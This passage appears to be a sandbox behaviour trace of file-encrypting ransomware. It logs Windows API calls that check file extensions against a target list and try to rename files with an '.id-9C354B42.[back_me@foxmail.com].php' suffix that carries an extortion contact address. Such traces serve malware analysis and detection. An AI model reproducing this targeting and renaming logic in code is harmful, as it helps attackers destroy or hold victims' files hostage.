(lpString1=".xlsx", lpString2="e.avi") returned -1 [0039.255] lstrlenW (lpString=".ppt") returned 4 [0039.255] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.255] lstrlenW (lpString=".zip") returned 4 [0039.255] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString=".rar") returned 4 [0039.255] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString=".bz2") returned 4 [0039.255] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString=".7z") returned 3 [0039.256] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.256] lstrlenW (lpString=".dbf") returned 4 [0039.256] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.256] lstrlenW (lpString=".1cd") returned 4 [0039.256] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.256] lstrlenW (lpString=".jpg") returned 4 [0039.256] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.256] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0039.256] lstrlenW (lpString="join.avi") returned 8 [0039.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.256] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=222208) returned 1 [0039.256] CloseHandle (hObject=0x1e4) returned 1 [0039.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0039.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.257] lstrlenW (lpString=".doc") returned 4 [0039.257] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.257] lstrlenW (lpString=".docx") returned 5 [0039.257] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0039.257] lstrlenW (lpString=".pdf") returned 4 [0039.257] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.257] lstrlenW (lpString=".xls") returned 4 [0039.257] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.257] lstrlenW (lpString=".xlsx") returned 5 [0039.257] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0039.257] lstrlenW (lpString=".ppt") returned 4 [0039.257] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.257] lstrlenW (lpString=".zip") returned 4 [0039.257] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.257] lstrlenW (lpString=".rar") returned 4 [0039.257] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.257] lstrlenW (lpString=".bz2") returned 4 [0039.257] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.257] lstrlenW (lpString=".7z") returned 3 [0039.257] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.257] lstrlenW (lpString=".dbf") returned 4 [0039.257] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.257] lstrlenW (lpString=".1cd") returned 4 [0039.257] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.258] lstrlenW (lpString=".jpg") returned 4 [0039.258] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.258] lstrlenW (lpString=".doc") returned 4 [0039.258] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString=".docx") returned 5 [0039.258] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0039.258] lstrlenW (lpString=".pdf") returned 4 [0039.258] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString=".xls") returned 4 [0039.258] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString=".xlsx") returned 5 [0039.258] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0039.258] lstrlenW (lpString=".ppt") returned 4 [0039.258] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.258] lstrlenW (lpString=".zip") returned 4 [0039.258] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString=".rar") returned 4 [0039.258] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString=".bz2") returned 4 [0039.258] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString=".7z") returned 3 [0039.258] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.258] lstrlenW (lpString=".dbf") returned 4 [0039.258] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.258] lstrlenW (lpString=".1cd") returned 4 [0039.258] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0039.259] lstrlenW (lpString=".jpg") returned 4 [0039.259] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.259] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0039.259] lstrlenW (lpString="split.avi") returned 9 [0039.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.259] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=194048) returned 1 [0039.259] CloseHandle (hObject=0x1e4) returned 1 [0039.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0039.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.259] lstrlenW (lpString=".doc") returned 4 [0039.259] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.259] lstrlenW (lpString=".docx") returned 5 [0039.259] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0039.259] lstrlenW (lpString=".pdf") returned 4 [0039.260] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString=".xls") returned 4 [0039.260] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString=".xlsx") returned 5 [0039.260] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0039.260] lstrlenW (lpString=".ppt") returned 4 [0039.260] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.260] lstrlenW (lpString=".zip") returned 4 [0039.260] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString=".rar") returned 4 [0039.260] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString=".bz2") returned 4 [0039.260] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString=".7z") returned 3 [0039.260] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.260] lstrlenW (lpString=".dbf") returned 4 [0039.260] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.260] lstrlenW (lpString=".1cd") returned 4 [0039.260] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.260] lstrlenW (lpString=".jpg") returned 4 [0039.260] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.260] lstrlenW (lpString=".doc") returned 4 [0039.260] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.260] lstrlenW (lpString=".docx") returned 5 [0039.260] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0039.260] lstrlenW (lpString=".pdf") returned 4 [0039.261] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.261] lstrlenW (lpString=".xls") returned 4 [0039.261] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.261] lstrlenW (lpString=".xlsx") returned 5 [0039.261] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0039.261] lstrlenW (lpString=".ppt") returned 4 [0039.261] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.261] lstrlenW (lpString=".zip") returned 4 [0039.261] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.261] lstrlenW (lpString=".rar") returned 4 [0039.261] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.261] lstrlenW (lpString=".bz2") returned 4 [0039.261] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.261] lstrlenW (lpString=".7z") returned 3 [0039.261] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.261] lstrlenW (lpString=".dbf") returned 4 [0039.261] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.261] lstrlenW (lpString=".1cd") returned 4 [0039.261] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0039.261] lstrlenW (lpString=".jpg") returned 4 [0039.261] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.261] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0039.261] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0039.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.262] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1600388) returned 1 [0039.262] CloseHandle (hObject=0x1e4) returned 1 [0039.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0039.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.262] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0039.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.262] lstrlenW (lpString=".doc") returned 4 [0039.262] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.262] lstrlenW (lpString=".docx") returned 5 [0039.262] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0039.262] lstrlenW (lpString=".pdf") returned 4 [0039.262] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString=".xls") returned 4 [0039.263] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString=".xlsx") returned 5 [0039.263] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0039.263] lstrlenW (lpString=".ppt") returned 4 [0039.263] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.263] lstrlenW (lpString=".zip") returned 4 [0039.263] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString=".rar") returned 4 [0039.263] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString=".bz2") returned 4 [0039.263] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString=".7z") returned 3 [0039.263] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.263] lstrlenW (lpString=".dbf") returned 4 [0039.263] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.263] lstrlenW (lpString=".1cd") returned 4 [0039.263] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.263] lstrlenW (lpString=".jpg") returned 4 [0039.263] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.263] lstrlenW (lpString=".doc") returned 4 [0039.263] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.263] lstrlenW (lpString=".docx") returned 5 [0039.263] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0039.263] lstrlenW (lpString=".pdf") returned 4 [0039.263] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.264] lstrlenW (lpString=".xls") returned 4 [0039.264] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.264] lstrlenW (lpString=".xlsx") returned 5 [0039.264] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0039.264] lstrlenW (lpString=".ppt") returned 4 [0039.264] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.264] lstrlenW (lpString=".zip") returned 4 [0039.264] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.264] lstrlenW (lpString=".rar") returned 4 [0039.264] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.264] lstrlenW (lpString=".bz2") returned 4 [0039.264] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.264] lstrlenW (lpString=".7z") returned 3 [0039.264] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.264] lstrlenW (lpString=".dbf") returned 4 [0039.264] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.264] lstrlenW (lpString=".1cd") returned 4 [0039.264] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0039.264] lstrlenW (lpString=".jpg") returned 4 [0039.264] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.264] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.264] lstrlenW (lpString="auxbase.xml") returned 11 [0039.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.265] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1434) returned 1 [0039.265] CloseHandle (hObject=0x1e4) returned 1 [0039.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0039.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.266] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0039.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0039.266] lstrlenW (lpString=".doc") returned 4 [0039.266] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.266] lstrlenW (lpString=".docx") returned 5 [0039.266] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0039.266] lstrlenW (lpString=".pdf") returned 4 [0039.266] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.266] lstrlenW (lpString=".xls") returned 4 [0039.266] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.266] lstrlenW (lpString=".xlsx") returned 5 [0039.266] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0039.266] lstrlenW (lpString=".ppt") returned 4 [0039.266] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0039.266] lstrlenW (lpString=".zip") returned 4 [0039.266] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.266] lstrlenW (lpString=".rar") returned 4 [0039.266] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.266] lstrlenW (lpString=".bz2") returned 4 [0039.266] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.266] lstrlenW (lpString=".7z") returned 3 [0039.266] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0039.266] lstrlenW (lpString=".dbf") returned 4 [0039.266] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.285] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0039.285] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0039.286] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0039.286] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0040.021] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2568) returned 1 [0040.021] CloseHandle (hObject=0x1bc) returned 1 [0040.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml")) returned 0x20 [0040.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0040.022] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0040.022] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0040.022] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0040.022] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0040.022] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0040.022] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0040.022] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0040.022] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0040.022] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0040.022] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0040.022] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0040.022] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0040.022] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0040.023] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0040.023] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0040.023] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0040.023] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0040.023] lstrcmpiW (lpString1=".dbf", 